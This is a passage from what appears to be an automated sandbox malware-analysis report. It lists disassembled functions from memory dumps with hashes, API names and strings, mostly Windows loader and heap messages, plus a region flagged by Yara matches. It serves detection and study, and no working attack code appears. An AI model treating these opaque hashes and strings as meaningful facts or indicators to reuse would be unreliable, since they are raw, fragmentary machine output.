                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: HEAP:
                                                  • API String ID: 3446177414-2466845122
                                                  • Opcode ID: dc3324f4e74ea60be9cdfee7dd24f7eb934c72cf5a48a1ae09d061809f6c5a53
                                                  • Instruction ID: 6dd3ee4cbfef7d225f84a95702e8967c897f7d36642e2e305a0ca8f5ec93fe9a
                                                  • Opcode Fuzzy Hash: dc3324f4e74ea60be9cdfee7dd24f7eb934c72cf5a48a1ae09d061809f6c5a53
                                                  • Instruction Fuzzy Hash: 61A16575A053128FEB04CE2CC894A1BB7E6FF89250F14492DE945DB311EB70EC46DB91

                                                  Control-flow Graph

                                                  Strings
                                                  • ExecuteOptions, xrefs: 345744AB
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 34574507
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 34574530
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3457454D
                                                  • Execute=1, xrefs: 3457451E
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 34574460
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 34574592
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: d0f0ddd204646deb1a6f904bd032178b0cfbc220d821f41f3b297cddba51a047
                                                  • Instruction ID: 5c2eb8af9138dff2414517ac598a8224e5863544c2b614de9347e4754c9957b4
                                                  • Opcode Fuzzy Hash: d0f0ddd204646deb1a6f904bd032178b0cfbc220d821f41f3b297cddba51a047
                                                  • Instruction Fuzzy Hash: D1513671E41219AFFF11AAA4EC95FAD77A8EF48341F4044ADE505A7180EB309A41EF60
                                                  Strings
                                                  • Actx , xrefs: 34567819, 34567880
                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 345677DD, 34567802
                                                  • SsHd, xrefs: 3451A304
                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 345677E2
                                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 345678F3
                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34567807
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                  • API String ID: 0-1988757188
                                                  • Opcode ID: f84e0c96f8bb3c01265638e0e1790a590ad6aa1c5b1d276efa61da21de87612c
                                                  • Instruction ID: a28b143af662e5f74f03b602aba369b42a61b3bab46f5d3f8115b5ed72c2667a
                                                  • Opcode Fuzzy Hash: f84e0c96f8bb3c01265638e0e1790a590ad6aa1c5b1d276efa61da21de87612c
                                                  • Instruction Fuzzy Hash: 9FE1C274E083018FFB16CE24D89071AB7E5FB85368F504A2DE866CB291DB35DD45EB82
                                                  APIs
                                                  Strings
                                                  • Actx , xrefs: 34569315
                                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 34569372
                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 3456914E, 34569173
                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34569153
                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34569178
                                                  • GsHd, xrefs: 3451D794
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                  • API String ID: 3446177414-2196497285
                                                  • Opcode ID: 83b8be96939302ba619bd5c7de26f4612f76a24aea76da3a9df1185f25fcc0aa
                                                  • Instruction ID: cc15a57cd317e5195c729701b12c586f06f9cb53cb81166dfffd71612123998a
                                                  • Opcode Fuzzy Hash: 83b8be96939302ba619bd5c7de26f4612f76a24aea76da3a9df1185f25fcc0aa
                                                  • Instruction Fuzzy Hash: 46E19C74E04342DFEB10CF18D880B5AB7E4BF88358F504A6DE9968B291D735E948DF92
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                  • API String ID: 3446177414-4227709934
                                                  • Opcode ID: d6a0b7a07e9d300ed9e7c58d7ce66f8206fe7e291444a91e431ba0fdb1b68dac
                                                  • Instruction ID: 879ec6709b27f0a516e628ae227366d9a8c6973f1ca002a4a3a4bbe6f2b35e84
                                                  • Opcode Fuzzy Hash: d6a0b7a07e9d300ed9e7c58d7ce66f8206fe7e291444a91e431ba0fdb1b68dac
                                                  • Instruction Fuzzy Hash: 34414BBAE01209ABDB01DF99D984AEEBFB5FF48354F100169E914E7340D771AA41EB90
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$@$@ww
                                                  • API String ID: 3446177414-2844824024
                                                  • Opcode ID: 0b5eaeac98fd5cb735dea4955d24a5ffe38e70148c1f092c68e5adfb993938ea
                                                  • Instruction ID: f3e878a89787e10d247b1daf85b5aaffaa15b950f05ca726b88a62aa8a64d017
                                                  • Opcode Fuzzy Hash: 0b5eaeac98fd5cb735dea4955d24a5ffe38e70148c1f092c68e5adfb993938ea
                                                  • Instruction Fuzzy Hash: 32814B75D00269DFEB21DB54CC41BDEB7B8AB44714F0081EAA909B7290E7349E85DFA1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                  • API String ID: 3446177414-3492000579
                                                  • Opcode ID: 930143995e48f4d10d13af2833fd9feac766290f4791c7d97d52c0a27dfc57f9
                                                  • Instruction ID: e06d941cd60b07d00c89fb2ab1e5ae3cc2558c05a247821f6fbbb6aab960082c
                                                  • Opcode Fuzzy Hash: 930143995e48f4d10d13af2833fd9feac766290f4791c7d97d52c0a27dfc57f9
                                                  • Instruction Fuzzy Hash: 3671CD36D05688DFDB02CFA8E490AADFBF1FF4A304F448069E485EB252CB359945EB54
                                                  APIs
                                                  Strings
                                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34559885
                                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34559843
                                                  • LdrpLoadShimEngine, xrefs: 3455984A, 3455988B
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 34559854, 34559895
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-3589223738
                                                  • Opcode ID: 1c6712088f4c766df7d7da3aa82da559812a2afaf1dd2cfbc396ca8e1eec2457
                                                  • Instruction ID: 564bfb346a29e3625cadfa16d8a016cc9f20d5d7c8568d91ca80e7fa08964441
                                                  • Opcode Fuzzy Hash: 1c6712088f4c766df7d7da3aa82da559812a2afaf1dd2cfbc396ca8e1eec2457
                                                  • Instruction Fuzzy Hash: E551FF36E00358DFEB04DBA8CC54AAD77A6FB90314F44016AE501FF2A6CB71A842DF85
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                  • API String ID: 3446177414-3224558752
                                                  • Opcode ID: 1fde033e69c7a4b694d528982b1a18fa5633f4f1af5780fb24eb915041f90f76
                                                  • Instruction ID: 259097a0ec3ce424f625bf97e2589d3e4472851c39e0987d34db8b8b094b6d0e
                                                  • Opcode Fuzzy Hash: 1fde033e69c7a4b694d528982b1a18fa5633f4f1af5780fb24eb915041f90f76
                                                  • Instruction Fuzzy Hash: 97412636E04740EFE711CF64D484B59B3A4FF81319F10896DE806977C2CB38A985EB91
                                                  APIs
                                                  Strings
                                                  • Entry Heap Size , xrefs: 345AEDED
                                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 345AEDE3
                                                  • HEAP: , xrefs: 345AECDD
                                                  • ---------------------------------------, xrefs: 345AEDF9
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                  • API String ID: 3446177414-1102453626
                                                  • Opcode ID: 5c1faf9b74b7c5a5755b899ccd66a03412311f199e104784060804b944552fa8
                                                  • Instruction ID: d6da506962557a7b9854900b7f31aff28957b881845b3a354c1eb37d2d74dc25
                                                  • Opcode Fuzzy Hash: 5c1faf9b74b7c5a5755b899ccd66a03412311f199e104784060804b944552fa8
                                                  • Instruction Fuzzy Hash: 71418B79E81611EFDB06CF18D88090ABBE6FF46355B25846DE404EB211D732EC43EB91
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                  • API String ID: 3446177414-1222099010
                                                  • Opcode ID: 73b55967dc2b4ef826db35a5de38caeaf566a7085d6a49f74297158298fb18c6
                                                  • Instruction ID: 67d66c1d70495bef63baaaf672fd7b8d451ee03d39ead32ab5477d7339774c13
                                                  • Opcode Fuzzy Hash: 73b55967dc2b4ef826db35a5de38caeaf566a7085d6a49f74297158298fb18c6
                                                  • Instruction Fuzzy Hash: BD312736E05BC4DFFB12CB24D928F4977E8EB02754F0048AAE44287AD2CB79A944DF55
                                                  APIs
                                                  Strings
                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 34573466
                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 34573439
                                                  • LdrpFindDllActivationContext, xrefs: 34573440, 3457346C
                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 3457344A, 34573476
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-3779518884
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F22
                                                  • wsprintfA.USER32 ref: 00405F5A
                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00405F6E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136219424394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000003.00000002.136219317322.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.136219535508.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.136219635683.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.136219744839.00000000007C5000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$UXTHEME
                                                  • API String ID: 2200240437-4069249669
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 3446177414-3610490719
                                                  APIs
                                                  Strings
                                                  • LdrpCheckModule, xrefs: 34569F24
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 34569F2E
                                                  • Failed to allocated memory for shimmed module list, xrefs: 34569F1C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-161242083
                                                  APIs
                                                  Strings
                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 34584508
                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 34584519
                                                  • LdrpCheckRedirection, xrefs: 3458450F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 3446177414-3154609507
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403612,0000000C), ref: 004065B4
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004065D0
                                                    • Part of subcall function 00405F0B: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F22
                                                    • Part of subcall function 00405F0B: wsprintfA.USER32 ref: 00405F5A
                                                    • Part of subcall function 00405F0B: LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00405F6E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136219424394.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000003.00000002.136219317322.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.136219535508.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.136219635683.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000003.00000002.136219744839.00000000007C5000.00000002.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                  • API String ID: 2547128583-890815371
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: ${Z4
                                                  • API String ID: 0-883611481
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$Flst
                                                  • API String ID: 0-758220159
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: ^O4
                                                  • API String ID: 3446177414-4076866778
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: 0$0
                                                  • API String ID: 3446177414-203156872
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: O4$mO4
                                                  • API String ID: 3446177414-3389149062
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "+$"3$0$3M$90$;$<$?ypG$A3$B$KK$\$^^$a?$b$gE$h$m)$n9$p>$pG$rj$s:$uS$|~$/$]$m
                                                  • API String ID: 0-3736242705
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6$O$S$\$s
                                                  • API String ID: 0-3854637164
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !$:=
                                                  • API String ID: 0-750662103
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: WQ
                                                  • API String ID: 0-2823796750
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: l
                                                  • API String ID: 0-1949682393
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_34f0000_kCwueywDTS.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: )
                                                  • API String ID: 0-2286802291
                                                  • Opcode ID: f7da05d91d6029853ce703304a1ae8aec393f1bd45c8a8d620a6595c87ef37a7
                                                  • Instruction ID: 346efb8f57ca0bc1da881f923a787830137d9c5b25b2edcad41b55cb3c1d1334
                                                  • Opcode Fuzzy Hash: f7da05d91d6029853ce703304a1ae8aec393f1bd45c8a8d620a6595c87ef37a7
                                                  • Instruction Fuzzy Hash: 4E11F4B6D01219AF9B40DFE9D9419EEB7F9FF88210F14456AE919E7200E7715A04CBE0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
